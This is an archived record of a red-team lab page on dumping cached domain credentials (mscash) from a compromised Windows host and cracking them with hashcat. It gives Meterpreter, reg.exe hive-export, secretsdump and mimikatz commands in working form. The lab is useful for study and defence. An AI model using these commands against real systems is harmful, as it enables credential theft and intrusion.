{
	"id": "5267afce-6fdb-4568-86fd-0c1361290f25",
	"created_at": "2026-04-06T03:36:10.229383Z",
	"updated_at": "2026-04-10T13:12:04.012693Z",
	"deleted_at": null,
	"sha1_hash": "f55c770e59eb03e99f7aa2c85368fc7382aa994b",
	"title": "Dumping and Cracking mscash - Cached Domain Credentials | Red Team Notes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 52726,
	"plain_text": "Dumping and Cracking mscash - Cached Domain Credentials |\r\nRed Team Notes\r\nPublished: 2019-03-12 · Archived: 2026-04-06 02:51:19 UTC\r\n1. offensive security\r\n2. Credential Access \u0026 Dumping\r\nDumping and Cracking mscash - Cached Domain Credentials\r\nThis lab focuses on dumping and cracking mscash hashes after SYSTEM-level privileges have been obtained on a compromised machine.\r\nMscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon. It's worth noting that cached credentials do not expire. Domain credentials are cached on a local system so that domain members can log on to the machine even if the DC is down. It's worth noting that the mscash hash is not passable - i.e. PTH attacks will not work.\r\nNote that in a meterpreter session, hashdump only dumps the local SAM account hashes:\r\nhashdump\r\nTo dump cached domain credentials in mscash format, use the post-exploitation module cachedump:\r\ngetuid\r\ngetsystem\r\nuse post/windows/gather/cachedump\r\nrun\r\nImpacket's secretsdump tool allows us to dump all the credentials that are stored in the registry hives SAM, SECURITY and SYSTEM, so first we need to write those out:\r\nreg.exe save hklm\\sam c:\\temp\\sam.save\r\nreg.exe save hklm\\security c:\\temp\\security.save\r\nreg.exe save hklm\\system c:\\temp\\system.save\r\nOnce the hives are retrieved, they can be pulled back to Kali Linux to extract the hashes:\r\nsecretsdump.py -sam sam.save -security security.save -system system.save LOCAL\r\nlsadump::cache\r\nTo crack mscache with hashcat, it should be in the following format:\r\n$DCC2$10240#username#hash\r\nMeterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to convert it. Below shows the original output format from cachedump and the format accepted by hashcat:\r\necho ; cat hashes.txt ; echo ; cut -d \":\" -f 2 hashes.txt\r\nLet's try cracking it with hashcat now:\r\nhashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --p\r\nThe cache can be seen via regedit (running with SYSTEM privileges) in the following key:\r\nHKEY_LOCAL_MACHINE\\SECURITY\\Cache\r\nNL$1..10 are the cached hashes for the 10 previously logged-on users:\r\nBy nulling out the Data fields one could remove the credentials from the cache. Once cached credentials are removed, if no DC is present, a user trying to authenticate to the system will see:\r\nLast updated 7 years ago",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials"
	],
	"report_names": [
		"dumping-and-cracking-mscash-cached-domain-credentials"
	],
	"threat_actors": [],
	"ts_created_at": 1775446570,
	"ts_updated_at": 1775826724,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.pdf",
		"text": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.txt",
		"img": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.jpg"
	}
}